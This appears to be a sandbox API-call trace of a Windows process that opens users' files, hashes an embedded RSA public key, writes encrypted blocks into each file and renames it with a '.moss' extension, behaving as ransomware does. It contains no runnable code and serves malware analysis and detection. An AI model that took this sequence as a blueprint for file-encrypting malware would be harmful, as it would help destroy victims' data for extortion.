[0172.140] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.141] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5698, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.141] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.141] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\A7tQuX7Bkim.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\a7tqux7bkim.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\A7tQuX7Bkim.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\a7tqux7bkim.png.moss")) returned 1 [0172.143] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\HxoFMCj9IM26.swf") returned=".swf" [0172.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\HxoFMCj9IM26.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\hxofmcj9im26.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.143] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=34058) returned 1 [0172.143] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.146] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x84e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.146] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.147] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x850a, lpOverlapped=0x0) returned 1 [0172.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.147] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.147] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.148] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.148] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.148] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.148] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.148] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.148] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.148] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.148] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.148] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.148] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.148] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.149] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.149] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x850a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.149] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.150] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\HxoFMCj9IM26.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\hxofmcj9im26.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\HxoFMCj9IM26.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\hxofmcj9im26.swf.moss")) returned 1 [0172.151] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\r0I-pmm5bEvli36ME5h.m4a") returned=".m4a" [0172.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\r0I-pmm5bEvli36ME5h.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\r0i-pmm5bevli36me5h.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.151] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=27530) returned 1 [0172.151] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.154] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6b64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.154] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.155] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6b8a, lpOverlapped=0x0) returned 1 [0172.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.156] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.157] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.157] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.157] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.157] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.157] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.158] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.158] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.158] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.158] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.158] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.158] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.158] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.159] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6b8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.159] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\r0I-pmm5bEvli36ME5h.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\r0i-pmm5bevli36me5h.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\r0I-pmm5bEvli36ME5h.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\r0i-pmm5bevli36me5h.m4a.moss")) returned 1 [0172.161] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\z89g-WpFIR4S.m4a") returned=".m4a" [0172.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\z89g-WpFIR4S.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\z89g-wpfir4s.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.161] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=94935) returned 1 [0172.161] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.164] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x172b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.164] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.165] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x172d7, lpOverlapped=0x0) returned 1 [0172.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.166] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.167] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.167] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.167] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.167] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.167] GetLastError () returned 0x0 [0172.167] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.167] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.168] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.168] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.168] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.168] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.169] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x172d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.169] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.169] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\z89g-WpFIR4S.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\z89g-wpfir4s.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\eL7ZGLErx\\z89g-WpFIR4S.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\el7zglerx\\z89g-wpfir4s.m4a.moss")) returned 1 [0172.170] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.170] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.171] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, 